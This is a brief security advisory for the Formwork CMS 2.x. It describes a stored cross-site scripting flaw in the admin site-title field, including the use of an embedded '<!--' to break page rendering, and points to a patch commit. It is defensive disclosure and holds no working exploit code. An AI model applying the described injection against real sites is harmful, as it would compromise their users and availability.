Name of the Vulnerable Software and Affected Versions Formwork versions 2.x

Description The site title field at "/panel/options/site" allows embedding JS tags, which can be used to attack all members of the system. This is a widespread attack and can cause significant damage if there is a considerable number of users. The attack leverages XSS and can impact system availability. By embedding "<!--", the source code can be rendered non-functional, significantly impacting system availability. However, the attacker would need admin privileges, making the attack more difficult to execute.

Recommendations For Formwork version 2.x, update to a version that includes the patch that escapes the site title from the panel header navigation, such as the version committed in aa3e9c6. As a temporary workaround, consider restricting access to the site title field to minimize the risk of exploitation.